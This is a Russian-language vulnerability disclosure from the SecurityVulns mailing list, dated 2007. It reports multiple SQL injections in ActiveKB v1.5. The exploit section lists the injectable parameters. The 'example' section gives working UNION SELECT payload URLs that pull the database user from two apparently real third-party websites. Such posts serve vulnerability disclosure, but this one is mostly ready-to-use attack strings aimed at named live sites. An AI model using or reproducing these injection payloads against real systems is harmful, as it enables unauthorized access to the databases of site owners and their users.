Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  eyeOS checksum prediction

  PhpGedView login page multiple XSS

  ePersonnel_RC_2004 Remote File Bug

  Moonware Software Multiple Vulnerabilities

From:durito <durito_(at)_mail.ru>
Date:28 августа 2007 г.
Subject:SQL-инъекция в ActiveKB v1.5

Здравствуйте, 3APA3A.

Software:   ActiveKB v1.5
Vendor:  www.interspire.com
Vulnerability: множественные SQL-инъекции
Risk:  средний
Date:  27.08.2007
discovered by durito [damagelab] -durito[at]mail[dot]ru-
HTTP:       durito.narod.ru

                        
+~~~:| Details |:

 SQL-инъекции

+~~~:| Экплойт |:

 http://www.target.com/activekb/index.php?ToDo=browse&catId=[SQL]
 http://www.target.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQ
L]


+~~~:| Пример |:

 http://www.accessecu.com/kb/index.php?ToDo=browse&catId=5+union+select+1,2,
AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/*
 http://summitsupport.net/index.php?ToDo=browse&catId=5+union+select+1,2,
AES_DECRYPT(AES_ENCRYPT(user(),0x73),0x73),4,5,6,7/*  

--
С уважением,
durito [NGH Group]                 mailto:durito@mail.ru
http://durito.narod.ru
http://ngh.void.ru

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru